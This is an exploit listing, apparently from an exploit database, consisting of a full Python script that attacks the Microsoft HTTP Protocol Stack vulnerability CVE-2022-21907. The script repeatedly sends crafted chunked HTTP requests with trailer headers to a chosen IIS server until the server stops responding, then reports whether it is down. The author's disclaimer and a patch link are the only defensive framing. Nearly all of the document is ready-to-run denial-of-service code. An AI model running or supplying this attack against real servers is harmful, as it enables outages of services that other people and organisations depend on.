Exploit for Microsoft HTTP Protocol Stack Denial Of Service CVE-2022-21907

Name: Exploit for Microsoft HTTP Protocol Stack Denial Of Service CVE-2022-21907
Rating: 5 (329 reviews)
2022-04-15 | CVSS 10.0
## https://sploitus.com/exploit?id=PACKETSTORM:166730
#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
# Exploit developed by the polakow from the past (@ltdominikow)  
# This exploit was made for testing own networks and patch affected systems. I'm not responsible if you do another thing with this exploit.  
# As a drunk wise man said: "Please, don't be a 'culiao'!" Use this exploit for testing your own network and patch your affected systems.  
  
from colorama import Fore, Style, init  
import argparse  
import socket  
import ssl  
import requests  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
  
  
def banner():  
print(f"""\n\n{Fore.GREEN} ****** ** ** ******** **** **** **** **** **** ** **** **** ******  
**////**/** /**/**///// */// * *///** */// * */// * */// * *** */// * *///**//////*  
** // /** /**/** / /*/* */*/ /*/ /* / /*//** /* /*/* */* /*  
/** //** ** /******* ***** *** /* * /* *** *** ***** *** /** / **** /* * /* *   
/** //** ** /**//// ///// *// /** /* *// *// ///// *// /** ///* /** /* *   
//** ** //**** /** * /* /* * * * /** * /* /* *   
//****** //** /******** /******/ **** /******/****** /****** **** * / **** *   
////// // //////// ////// //// ////// ////// ////// //// / //// / """)  
print(f"\n\nAuthor: polakow(@ltdominikow)\n{Style.RESET_ALL}")  
print(f"{Fore.RED}[!] Warning: This exploit was made for testing own networks and patch affected systems. I'm not responsible if you do another thing with this exploit.{Style.RESET_ALL}\n")  
print(f"{Fore.CYAN}[*] Patch URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907{Style.RESET_ALL}\n")  
  
  
def parseArgs():  
parser = argparse.ArgumentParser(description="Description message")  
parser.add_argument("-t", "--target", default=None, required=True, help="IIS Server. For instance: 192.168.1.110")  
parser.add_argument("-p", "--port", default=None, required=True, help="Port of the IIS server. For instance: 80")  
parser.add_argument("-v", "--ipversion", default=None, required=True, help="IP version: 4 or 6")  
return parser.parse_args()  
  
  
def isServiceRunning(ip, port, ipVersion):  
  
if port == 443:  
targetURL = "https://"  
else:  
targetURL = "http://"  
  
if ipVersion == 6:  
targetURL = targetURL + '[' + ip + ']'  
else:  
targetURL = targetURL + ip  
  
try:  
requests.get(targetURL, timeout=4, verify=False)  
except Exception as e:  
return False  
  
return True  
  
def checkServerStatus(ip, port, ipVersion):  
if isServiceRunning(ip, port, ipVersion):  
print(f'[*] The server is {Fore.GREEN}running{Style.RESET_ALL}!')  
else:  
print(f'[!] The server is {Fore.RED}not running{Style.RESET_ALL}!')  
  
  
def exploit(ip, port, ipVersion):  
  
print("[*] Attacking: %s on port %d" % (ip, port))  
  
# Evil request  
  
data = "200\r\n" + "A" * 0x200 + "\r\n" + "200\r\n" + "A" * 0x200 + "\r\n" + "200\r\n" + "A" * 0x200 + "\r\n" + "200\r\n" + "A" * 0x200 + "\r\n"  
  
if ipVersion == 6:  
payload = "GET / HTTP/1.1\r\nHost: " + '[' + ip + ']' + ":" + str(port) + "\r\nTE: trailers\r\nTransfer-Encoding: chunked\r\n\r\n" + data + data + "0\r\n\r\n"  
payload2 = "GET /\r\nHost: " + '[' + ip + ']' + ":" + str(port) + "\r\nTE: trailers\r\nTransfer-Encoding: chunked\r\n\r\n" + data + data + "0\r\n\r\n"  
else:  
payload = "GET / HTTP/1.1\r\nHost: " + ip + ":" + str(port) + "\r\nTE: trailers\r\nTransfer-Encoding: chunked\r\n\r\n" + data + data + "0\r\n\r\n"  
payload2 = "GET /\r\nHost: " + ip + ":" + str(port) + "\r\nTE: trailers\r\nTransfer-Encoding: chunked\r\n\r\n" + data + data + "0\r\n\r\n"  
  
# Attack!  
  
for i in range(0, 100000):  
try:  
# IPv6  
if ipVersion == 6:  
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)  
else:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
s.settimeout(5)  
  
# Attack HTTPS or HTTP  
  
if port == 443:  
context = ssl._create_unverified_context()  
so = context.wrap_socket(s, server_hostname=ip)  
  
so.connect((ip, port))  
so.sendall(payload.encode('ascii'))  
if i % 10000 == 0:  
print("[*] Sending evil payload...")  
so.sendall(payload2.encode('ascii'))  
else:  
s.connect((ip, port))  
s.sendall(payload.encode('ascii'))  
if i % 10000 == 0:  
print("[*] Sending evil payload...")  
s.sendall(payload2.encode('ascii'))  
except socket.timeout:  
print("[*] Timeout! Checking server status...")  
checkServerStatus(ip, port, ipVersion)  
break  
except Exception as e:  
print(e)  
break  
  
  
if __name__ == '__main__':  
init(convert=True)  
  
# Banner  
  
banner()  
  
# Args  
args = parseArgs()  
  
port = args.port  
ipVersion = args.ipversion  
  
# Check digits  
  
if not port.isdigit() and not ipVersion.isdigit():  
print("The port must be a number!")  
exit(1)  
  
# Remove protocol  
  
if args.target.startswith('https://'):  
ip = args.target.replace("https://", "")  
elif args.target.startswith('http://'):  
ip = args.target.replace("http://", "")  
else:  
ip = args.target  
  
# Remove backslash  
  
if ip.endswith("/"):  
ip = ip.replace("/", "")  
  
# Remove ipv6 http/https  
  
if ip.endswith("]") and ip.startswith("["):  
ip = ip.replace("[", "").replace("]", "")  
  
# Check ip version  
  
if not int(ipVersion) == 6 and not int(ipVersion) == 4:  
print("The IP version is invalid.")  
exit(1)  
  
# Check server status  
  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
  
checkServerStatus(ip, int(port), int(ipVersion))  
  
# Exploit!  
  
exploit(ip, int(port), int(ipVersion))